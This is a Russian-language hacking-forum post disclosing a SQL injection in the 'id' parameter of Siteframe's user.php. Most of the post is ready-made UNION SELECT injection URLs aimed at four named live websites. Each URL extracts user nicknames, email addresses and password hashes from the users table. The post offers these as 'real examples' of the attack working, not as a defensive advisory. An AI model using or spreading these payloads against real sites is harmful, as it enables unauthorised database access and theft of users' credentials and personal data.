Форум АНТИЧАТ - Sql injection в Siteframe

Надеюсь, не боян :)

Программа: Siteframe любой версии

Описание: Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" в сценарии user.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:

Код:

http://site/user.php?id=-1[sql injection]

Url производителя: http://siteframe.org/

Реальные примеры:
Siteframe.org:

Код:

http://v3.siteframe.org/user.php?id=-1%20union%20select%201,2,3,4,users.user_id,6,concat(user_nickname,char(58),users.user_email,char(58),users.user_passwd),8,9,0,11%20from%20users/*

Код:

http://myolympus.org/user.php?id=-1%20union%20select%201,2,3,4,5,6,concat(user_nickname,char(58),users.user_email,char(58),users.user_passwd),8,9,0,11%20from%20users/*

Код:

http://fujirangefinder.com/user.php?id=-1%20union%20select%201,2,3,4,users.user_id,6,concat(user_nickname,char(58),users.user_email,char(58),users.user_passwd),8,9,0,11%20from%20users/*

Код:

http://www.zooptek.net/siteframe/user.php?id=-1%20union%20select%201,2,3,4,users.user_id,6,concat(user_nickname,char(58),users.user_email,char(58),users.user_passwd),8,9,0,11%20from%20users/*

Воть :)